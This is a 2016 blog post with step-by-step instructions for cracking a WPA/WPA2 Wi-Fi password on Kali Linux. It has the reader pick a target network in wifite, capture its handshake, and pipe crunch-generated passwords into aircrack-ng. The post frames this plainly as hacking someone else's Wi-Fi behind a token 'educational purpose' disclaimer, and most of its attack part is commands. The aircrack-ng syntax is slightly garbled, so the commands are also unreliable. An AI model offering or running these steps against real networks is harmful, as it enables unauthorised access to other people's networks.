Friday 6 May 2016

WI-FI Hacking Without WORDLIST using KALI LINUX





Hey Friends,
Today I am Going To Show You How To Hack Wifi Wpa And Wpa2 Using Crunch Without Creating Wordlist, most of the hacking methods that you find on internet are cracking wifi using wordlist, a wordlist contains millions of words(that can be used as a password).


NOTE-THIS IS FOR EDUCATIONAL PURPOSE ONLY,  PLEASE DON'T DO ANYTHING  ILLEGAL ACTIVITIES, 

STEPS

STEP 01> Open Terminal in KALI-LINUX

STEP 02> type "wifite"  (without double inverted coma)

STEP 03> after entering first command and then a wifi list will be generated on your screen , when you see the targeted wifi name & its details then press CTRL+C

STEP 04> then enter the number of targeted wifi in the list

STEP 05> then kali linux try to handshake and capture a file in which  store the details of targeted wifi

STEP 06>after the successful massage ...go to "Home" Directory where a new directory is created with the extension of "XXXXXXXX.cap" file

STEP 07>now type "crunch n m PassPhrase | aircrack-ng handshake.cap -w - - e NameOfTheNetwork"
eg- crunch 10 10 0123456789 | aircrack-ng XXXXXX.cap -w - - e Rohit_wifi

STEP 08>now, just go to sleep & have patience....it will take appx 8-15 hours to hack someones wifi.


List of Commands 
- wifite
- press CTRL+C
- enter number fo target wifi
crunch 10 10 0123456789 | aircrack-ng XXXXXXXX.cap -w - - e NameOfTheNetwork 


Screen Shots



No comments:

WINDOWS SUBSYSTEM FOR LINUX

Microsoft partnered with Canonical (creator of Ubuntu) to bring Linux environment experience in Windows 10. Through Windows Subsystem F...